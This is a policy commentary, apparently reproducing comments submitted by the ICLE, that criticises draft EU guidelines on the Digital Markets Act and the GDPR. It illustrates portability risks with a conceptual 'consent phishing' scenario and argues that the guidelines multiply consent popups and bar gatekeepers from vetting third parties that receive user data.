Comments on the interplay of the EU DMA and the GDPR
The European Commission and the European Data Protection Board (EDPB) are preparing guidelines on the interplay of the Digital Markets Act with the EU’s main privacy law - the General Data Protection Regulation (the GDPR). This is a topic I covered here extensively, most recently in Apple’s new DMA criticism, EU-only feature delays, and what’s next, Debating the EU “pay or consent” decision against Meta, and EU DMA workshops: Google, Amazon, Apple, Meta, and Microsoft. While preparing the guidelines, the authorities asked for comments and I prepared a response to that call, which the International Center for Law & Economics submitted yesterday. Below, you’ll find the contents of my comments.
Executive Summary
The approach adopted in the Draft Joint Guidelines will lead to a new proliferation of “consent popups” at a time when the Commission is seeking to address similar past failures of EU law regarding “cookie banners”. Users of digital services regulated under the DMA are likely to see further declines in the quality of their experience, and this could further damage the reputation of EU law. The DMA’s goals do not necessitate this approach, and we encourage both the EDPB and the Commission’s DMA Team to address the issue of consent in a more user-friendly way.
The guidelines disproportionately contradict the aims of EU data protection and cybersecurity laws by requiring that gatekeepers do not warn users about clear and realistic risks that attend data portability (especially real-time and continuous portability) and by preventing gatekeepers from excluding known bad actors as recipients of user data. Effectively, the Draft Joint Guidelines would even mandate that gatekeepers support and enable campaigns by criminal or foreign-enemy-state actors to collect EU personal data, so long as those actors inform the gatekeeper—even falsely—that they’re EU organisations and don’t plan to transfer personal data outside the European Economic Area (EEA).
More generally, the guidelines depart from previously stated Commission policy, supported directly by the DMA, that gatekeepers have a duty to ensure DMA-implementation measures comply with other laws, including those on data protection and cybersecurity. Instead, the Draft Joint Guidelines propose to prohibit gatekeepers from implementing the most effective measures to achieve such compliance.
The guidelines interpret the DMA and the GDPR inconsistently. Without appropriate justification, some serious data-protection risks (e.g., those related to data portability) are not addressed as robustly as others (e.g., the sharing of search data).
The Draft Joint Guidelines also omit interoperability mandates under Article 6(7) DMA, incorrectly suggesting that such obligations pose no serious privacy issues. In fact, such issues include questions regarding the interplay between the DMA and the GDPR, as well as the ePrivacy Directive.
I. PROLIFERATION OF CONSENT REQUESTS (ARTICLES 5(2), 6(10) DMA)
The European Commission last month proposed legislation to address the problem of “cookie consent fatigue” by changing rules that are “outdated and inadequate for contemporary privacy and data needs”. It is therefore surprising to see the EDPB and the Commission’s DMA team pursue guidelines that would vastly increase the proliferation of consent requests with which EU users of digital services are bombarded.
The excessive reliance on ever-more consent requests, without any investigation of ways to reduce the need for them in accordance with the law, flies in the face of the current research on data protection. Even vocal critics of the ways that digital services use personal data recognize that the consent-centric approach has been a failure.
We should expect more from public authorities than the unthinking application of the consent paradigm, while failing to address the actual problems of data protection and security.
The Draft Joint Guidelines contribute to the disproportionate proliferation of consent requests in the following ways:
- Consent requests for the use of third-party data for online advertising, combining and cross-using personal data (Article 5(2) DMA) are meant to be further divided into various “purposes” like “personalisation of content, personalisation of advertisements, and service development” (at [31]). While the guidelines direct gatekeepers to combine DMA and DMA-GDPR requests, avoiding the need to further double many consent requests, this doesn’t address the increased consent fatigue that users will experience (at [42]).
- The Draft Joint Guidelines’ section on “ensuring user-friendly choices and consent designs” is a stark example of what has been dubbed the “nerd harder” approach (at [40]-[45]), without providing much actionable guidance on consent design. In its preoccupation to present choices in a “neutral” manner, the section fails to propose even the contours of a positive guiding example (g., must “yes” and “no” buttons have same the colour and contrast even if it’s a basic user-experience practice to give them different colours, thus enabling rather stifling choice?). Moreover, the section presents vague goals regarding user comprehension as a benchmark, merely paraphrasing the legal texts (at [45]). In doing so, it fails to adopt a realistic assessment of users’ level of interest and familiarity with legal frameworks like the DMA and GDPR.
- The guidelines are unclear regarding separate consent requests for processing special category data under Article 5(2). They may be read as imposing a new disproportionate requirement to seek such consent, together with Article 5(2) DMA consent, even where there is no requirement to ask for it under the GDPR (g., when the gatekeeper has already obtained consent) (at [37]).
- The Draft Joint Guidelines acknowledge that users could be overwhelmed by a large number of requests from businesses for user-data portability under Article 6(10) DMA (“in particular where requests are repetitive or disruptive of the end user’s experience”) (at [172]). Even with regard to obvious cases of abuse, however, the guidelines fail to state clearly that gatekeepers can protect users from “repetitive or disruptive” requests. Instead, they offer a vague statement about “layered and intuitive consent interfaces”, which does not address whether gatekeepers can refuse to convey some consent requests.
II. ANTI-DATA PROTECTION AND SECURITY REQUIREMENTS (ARTICLES 6(9) AND 6(10) DMA)
The DMA’s provisions on data portability, in Article 6(9) and 6(10), indisputably create data-protection and security risks. This is true not only for end users of DMA-regulated services, but also for any other person whose data happens to be in the user’s service account or—on the guidelines’ broad interpretation—even on the user’s device. These include new risks that users would neither expect, nor understand. Consider the following example.
A user, currently logged into a major social-networking service (the Gatekeeper), encounters a viral third-party application promising a “Digital Nostalgia” service. The application claims to use artificial intelligence (AI) to scan the user’s history and generate a sentimental video montage of their friendships. To initiate this process, the user is forwarded from the third-party website to the Gatekeeper’s authorization screen.
Because the user is already authenticated on the platform, they do not need to enter credentials; they are immediately presented with a standard consent popup. This popup bears the social network’s familiar and trusted branding. It lists the permissions the third-party app requires, which include access to historical photos—including images shared only with close friends or romantic partners—private message archives, and contact lists.
Crucially, the user sees only the Gatekeeper’s familiar interface and instinctively applies the trust they have in that established platform to the unknown third party. The Gatekeeper’s consent screen effectively launders the legitimacy of an unvetted requestor. Conditioned by years of “consent fatigue” from cookie banners and terms-of-service updates, the user performs a cursory scan of the permission list—indistinguishable from dozens of benign requests they have approved before—and clicks “Allow” to access the promised feature.
In that single instant, the nefarious application triggers the data-portability interfaces mandated by the DMA. This grants the third-party actor immediate access to a massive trove of sensitive historical data, allowing them to exfiltrate years of private correspondence and intimate media without further interaction from the user. The application need not even deliver the promised nostalgia video, although this may be helpful to attract more victims. The Gatekeeper’s trusted UI effectively cloaks the risk of the unknown third-party requestor, creating a “Trojan Horse” effect where the ease of portability is weaponised against the user’s privacy.
Under the requirement for “continuous and real-time” access, the threat extends beyond the user’s historical data. By granting this permission, the user has inadvertently authorised a persistent data stream—effectively a “live wire” connected to their account. Even after the user closes the “Digital Nostalgia” tab and forgets the application exists—not having received any ongoing notification that data sharing continues (at least for months)—the third-party service retains a valid access token or webhook subscription. This allows the nefarious actor to instantaneously receive copies of every new private message sent, every new photo uploaded, and every location tag created. The user is under active surveillance, with their ongoing digital life being mirrored to a malicious server.
This asymmetry compounds the harm: a single click grants access, but revocation—if the user even remembers the application exists—can only break the link for future data. Any data already exfiltrated is, of course, already in the attacker’s possession. The harvested information opens multiple vectors for exploitation: intimate images may be leveraged for sextortion; private messages mined for credentials, security questions, or blackmail material; and complete social graphs may be sold to data brokers, stalkers, or abusive ex-partners. All this stems from a single, momentary click on a consent form that took less time to approve than to read.
This textbook example of “consent phishing” has some resemblance with the infamous Cambridge Analytica case. But much less information was available to Facebook apps like “This Is Your Digital Life” in 2014-15 than would be under the DMA; importantly, there was no risk to private photos or messages. This is what is new about the risk: at a single click, an entire account and its most private contents could be sent to a third party (not to mention setting up ongoing surveillance).
Neither the European Commission, nor any other EU body, is currently conducting a public-information campaign to address this issue. This is despite the obvious fact that users of at least some DMA-regulated services have grown accustomed, with good reason, to trust that the manufacturer/service provider would not allow users to harm themselves so easily. But this is now possible under the DMA.
Indeed, the Draft Joint Guidelines are generally dismissive of DMA-created risks to data protection and data security, which is surprising given the participation of the EDPB. Instead, they are preoccupied with interpreting the DMA’s explicit security and privacy provisions as narrowly as possible. The example detailed above illustrates two key problems with the guidelines:
- They require gatekeepers not to warn users about clear and realistic risks of data portability; and
- They prevent gatekeepers from excluding known bad actors as recipients of user data.
The guidelines state that “portability options and the wording used to describe them should be provided in a neutral and objective manner and should not nudge end users towards a specific choice” (at [126]). In other words, they require gatekeepers to act as if every choice to port data—even a choice that would expose an entire service account (with private messages, etc.) or all data on a user device—is equally neutral and safe, which is obviously not the case.
Moreover, the guidelines explicitly forbid gatekeepers from restricting third parties’ receipt of user data—even when, e.g., the third party has previously been fined or convicted for GDPR violations or is known to engage in practices like “consent phishing”. The Draft Joint Guidelines state (at [131]):
Gatekeepers should also not gather information pertaining to the authorised third party’s compliance measures under the GDPR, including potential administrative or judicial proceedings the third party has undergone in relation to compliance with the GDPR, or whether the third party has suffered breaches of data security in the past.
Gatekeepers would only be permitted to request “third parties’ identity details and information on whether, and to what extent’ the data to be ported” will involve transfers outside the EEA (to a country without an adequacy decision) (at [130]). The guidelines do not mention the possibility of gatekeepers being allowed to verify whether such minimum information is even provided truthfully. In effect, gatekeepers are entirely disarmed from protecting users, even where they know the user is about to become a victim of consent phishing or another kind of attack.
The shortsightedness of this approach is especially staggering given the current geopolitical situation and well-known cyber operations of unfriendly states against the EU. The answer that the Draft Joint Guidelines provides to the issue of potential violations by third-party DMA beneficiaries is that such third parties are subject to the GDPR and potential GDPR enforcement (see the next section). Obviously, data-protection authorities will deter no criminal or state actor, and it is trivially easy to concoct front businesses putatively based in the EU, especially when gatekeepers are barred from verifying any information.
III. PROHIBITING GATEKEEPERS FROM IMPLEMENTING THE MOST EFFECTIVE MEASURES FOR DATA PROTECTION AND CYBERSECURITY
As noted above, according to the Draft Joint Guidelines, any privacy or security violations by DMA-beneficiary third parties can only be policed by actors other than the gatekeepers. The key problem with this approach is that gatekeepers are, in at least some cases, best placed to perform this oversight. Indeed, prevention is likely to be the only intervention that matters, especially in cases like data exfiltration through “consent phishing”.
Effective approaches are needed, because data protection and security are exceedingly difficult to police in practice—both in terms of deterrence and in terms of enforcement against violators. It simply cannot be credibly maintained that the mere fact that DMA’s beneficiaries are theoretically subject to the GDPR solves the issue of GDPR compliance. This is especially true for non-EU actors who aim to benefit from the DMA, either through legitimate but economically insignificant EU establishments, or by simply lying to gatekeepers about their identities.
In adopting this approach, the guidelines depart from previously stated Commission policy, supported directly by the DMA, that gatekeepers have a duty to ensure DMA implementation measures comply with other laws, including those on data protection and cybersecurity. For instance, Commissioner Margrethe Vestager stated in the European Parliament that:
It is for the companies to decide how will they present their services, their operating system, how will they make them safe for you and comply with the DMA.
This aligns with Article 8(1) DMA, which states:
The gatekeeper shall ensure that the implementation of those measures complies with applicable law, in particular Regulation (EU) 2016/679, Directive 2002/58/EC, legislation on cyber security, consumer protection, product safety, as well as with the accessibility requirements.
The guidelines note that (at [88]), but add, in the context of Article 6(4):
At the same time, gatekeepers should not seek to instrumentalize their compliance with other applicable laws with a view to make their compliance with Article 6(4) DMA less effective. When selecting among several possible appropriate measures to comply with obligations stemming from other applicable laws, gatekeepers should select the measures that less adversely affect the pursuit of the objectives of Article 6(4) DMA, provided that they remain effective in ensuring compliance with those other applicable laws.
The legal interpretation implicit in this paragraph is highly questionable, as it appears to assume that DMA obligations take precedence over obligations from other EU legislation. One should ask whether the Draft Joint Guidelines apply the same logic to their interpretation of the DMA. In other words, when there are several ways to interpret the DMA and pursue its goals, do the guidelines choose those that less adversely affect pursuing other EU law objectives, including minimising restrictions of the rights protected by the EU Charter? Little in the Draft Joint Guidelines suggests that such balancing has been conducted, and that the guidelines are defensible from this perspective.
Setting this aside, Article 8(1) is entirely absent from the guidelines’ section on the data-portability mandate under 6(10) DMA. The section on Article 6(9) references Article 8(1) in its discussion on authorised third parties, mentioning the GDPR’s principle of integrity and confidentiality (Article 5(1)(f) GDPR) and the requirement to ensure the security of personal-data processing (Article 32 GDPR) (at [129]). Notably, the principle of data minimization (Article 5(1)(c) GDPR) is not mentioned.
In that discussion, the Draft Joint Guidelines make the already-quoted point that gatekeepers should neither gather information on GDPR compliance by third parties wanting to benefit from the DMA, nor act on any information about their noncompliance. That point is followed by the following sentence (at [131]):
Such information would not necessarily be an indicator of future compliance or the security of an application or related processing, and as such is not strictly necessary to comply with the gatekeeper’s own responsibility under the GDPR.
This reveals two important assumptions implicitly made in the guidelines, detailed in the next two subsections.
A. Gatekeepers Only Responsible for Own GDPR Compliance
First, Article 8(1) DMA concerns only “the gatekeeper’s own responsibility under the GDPR”. This is not the only possible reading of Article 8(1), and the guidelines provide no argument why this reading should be adopted. On an alternative reading, which aligns with previous Commission policy as stated by Commissioner Vestager, gatekeepers are meant to ensure that DMA implementation measures comply with other laws, full stop.
In other words, it is the gatekeepers’ responsibility to ensure—to the extent they can—that implementation measures do not lead to noncompliance with those other laws. It is true that gatekeepers cannot fully control, for instance, what third parties do with ported user data. But this does not mean that they should not at least implement technical and organisational measures (e.g., contractual measures) to safeguard compliance to the feasible extent. They are, after all, best placed to adopt such safeguards.
If gatekeepers do not do so, then DMA-created risks like the “consent phishing” example from the previous section will meet with no effective prevention. In other words, gatekeepers are the lowest-cost avoiders of harm. It is hard to argue that the aim of preventing them from performing a necessary service that they are best placed to do could be attributed to a rational choice by the EU legislature.
What is most puzzling is that the Draft Joint Guidelines do recognise this rather obvious point, but only in the section on search-engine data sharing under Article 6(11) DMA. There, the guidelines explicitly contemplate an implementing act that (at [189]):
…may include an obligation for gatekeepers to contractually impose measures, where appropriate, on eligible third-party undertakings as a condition to access the data. Contractual requirements may, among others, limit onward sharing of the data received by eligible third-party undertakings. The implementing act may also impose specific monitoring obligations on the gatekeeper and also specify appropriate measures that gatekeepers must take in case of an established violation by third-party undertakings providing online search engines of requirements set out in the contract. Such measures may include requiring the gatekeeper to notify the competent data protection supervisory authority in case of an alleged breach of the GDPR, cease sharing data with the third-party undertaking providing an online search engine, and providing it with the contractual right to order the third party to delete any data it received from the gatekeeper.
We will return in the next section to this inconsistency in how the guidelines treat Article 6(11) and other provisions.
B. GDPR Applies Only to the Extent ‘Strictly Necessary’
The other revealed assumption in the Draft Joint Guidelines is that gatekeepers’ responsibility under the GDPR should be interpreted narrowly, placing the DMA’s goals above the GDPR’s goals. The sentence from the guidelines cited above restricts the GDPR’s application in a way that has no basis in the DMA: Gatekeepers are only allowed to comply with the GDPR to the extent this is “strictly necessary”(at [131]). And not just “strictly necessary” as this is typically understood, but in some qualified, extreme sense.
In fact, it is hard to see the limiting principle of this restriction, given how facially unreasonable the provided example is. The guidelines state that, because it is not always the case (“would not necessarily be an indicator”) that third parties’ previous GDPR violations are predictive of future GDPR violations, there can never be a situation where prior violations indicate a strong likelihood of future violations. More precisely, there can never be a situation where knowledge of prior violations would permit a gatekeeper to better comply with the GDPR by refusing to transfer user personal data (likely including special categories of data) to such third parties. This is extremely surprising, given the EDPB’s co-authorship of the guidelines.
As far as the DMA is concerned, it states that it applies “without prejudice” to the GDPR (see, e.g., recital 12). The DMA contains no general qualification that laws with respect to which it remains “without prejudice” apply only to the “strictly necessary” extent, much less in the extreme version suggested by the cited sentence.
To read the final two sections on the inconsistent interpretation of the DMA and the GDPR and on the omission of interoperability mandates (Article 6(7) DMA) go to the ICLE website.